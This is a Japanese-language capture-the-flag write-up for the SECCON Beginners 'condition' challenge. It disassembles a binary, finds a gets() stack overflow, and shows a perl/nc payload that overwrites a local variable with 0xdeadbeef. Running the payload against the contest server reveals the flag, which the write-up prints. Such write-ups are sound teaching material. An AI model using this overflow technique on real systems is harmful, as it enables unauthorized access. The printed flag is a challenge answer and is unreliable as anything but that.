問題文

あなたは flag にアクセスする権限を持っていますか？
Host: pwn1.chall.beginners.seccon.jp
Port: 16268
添付ファイル：condition_68187f0953551cea907c48c016f19ff200de74b4

writeup

fileコマンドで調べる。

root@kali:[Warmup] condition# file ./condition_68187f0953551cea907c48c016f19ff200de74b4 
./condition_68187f0953551cea907c48c016f19ff200de74b4: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=855948dc75c58cfbefe60b921e6b737675a18ca3, not stripped

実行してみる。

root@kali:[Warmup] condition# ./condition_68187f0953551cea907c48c016f19ff200de74b4 
Please tell me your name...AAAA
Permission denied

stringsで見てみる。
何らかの条件に合致するとflag.txtを出力してくれると推測。

root@kali:[Warmup] condition# strings condition_68187f0953551cea907c48c016f19ff200de74b4 > condition.txt 
root@kali:[Warmup] condition# cat condition.txt 
(snip)
Please tell me your name...
OK! You have permission to get flag!!
flag.txt
Permission denied
(snip)

objdumpで見てみる。
rbp-0x4のアドレスの値が0xdeadbeefであることが条件のようだ。

root@kali:[Warmup] condition# objdump -d -Mintel condition_68187f0953551cea907c48c016f19ff200de74b4 > condition.dmp.txt 

root@kali:[Warmup] condition# cat condition.dmp.txt 
(snip)
0000000000400771 <main>:
  400771:   55                      push   rbp
  400772:   48 89 e5                mov    rbp,rsp
  400775:   48 83 ec 30             sub    rsp,0x30
  400779:   c7 45 fc 00 00 00 00    mov    DWORD PTR [rbp-0x4],0x0
  400780:   bf d8 08 40 00          mov    edi,0x4008d8
  400785:   b8 00 00 00 00          mov    eax,0x0
  40078a:   e8 71 fe ff ff          call   400600 <printf@plt>
  40078f:   48 8d 45 d0             lea    rax,[rbp-0x30]
  400793:   48 89 c7                mov    rdi,rax
  400796:   b8 00 00 00 00          mov    eax,0x0
  40079b:   e8 80 fe ff ff          call   400620 <gets@plt>
  4007a0:   81 7d fc ef be ad de    cmp    DWORD PTR [rbp-0x4],0xdeadbeef
  4007a7:   75 16                   jne    4007bf <main+0x4e>
  4007a9:   bf f8 08 40 00          mov    edi,0x4008f8
  4007ae:   e8 0d fe ff ff          call   4005c0 <puts@plt>
  4007b3:   bf 1e 09 40 00          mov    edi,0x40091e
  4007b8:   e8 16 00 00 00          call   4007d3 <read_file>
  4007bd:   eb 0a                   jmp    4007c9 <main+0x58>
  4007bf:   bf 27 09 40 00          mov    edi,0x400927
  4007c4:   e8 f7 fd ff ff          call   4005c0 <puts@plt>
  4007c9:   bf 00 00 00 00          mov    edi,0x0
  4007ce:   e8 6d fe ff ff          call   400640 <exit@plt>
(snip)

gdbで入力文字列を変えながらメモリ状態を確かめると、$rbp-0x4は入力文字列の45バイト目以降を指すようだ。

Aで44文字埋めて、45文字目以降を0xdeadbeefにした文字列を送り込む。
(リトルエンディアン考慮に注意。)
適当な文字列でflag.txtを作って試す。

ctfuser@kali:[Warmup] condition$ cat flag.txt 
hogehoge

ctfuser@kali:[Warmup] condition$ perl -e 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde\n"' | ./condition_68187f0953551cea907c48c016f19ff200de74b4 
Please tell me your name...OK! You have permission to get flag!!
hogehoge

成功した。

ctfuser@kali:[Warmup] condition$ perl -e 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde\n"' | nc pwn1.chall.beginners.seccon.jp 16268
Please tell me your name...OK! You have permission to get flag!!
ctf4b{T4mp3r_4n07h3r_v4r14bl3_w17h_m3m0ry_c0rrup710n}

フラグゲット。
ctf4b{T4mp3r_4n07h3r_v4r14bl3_w17h_m3m0ry_c0rrup710n}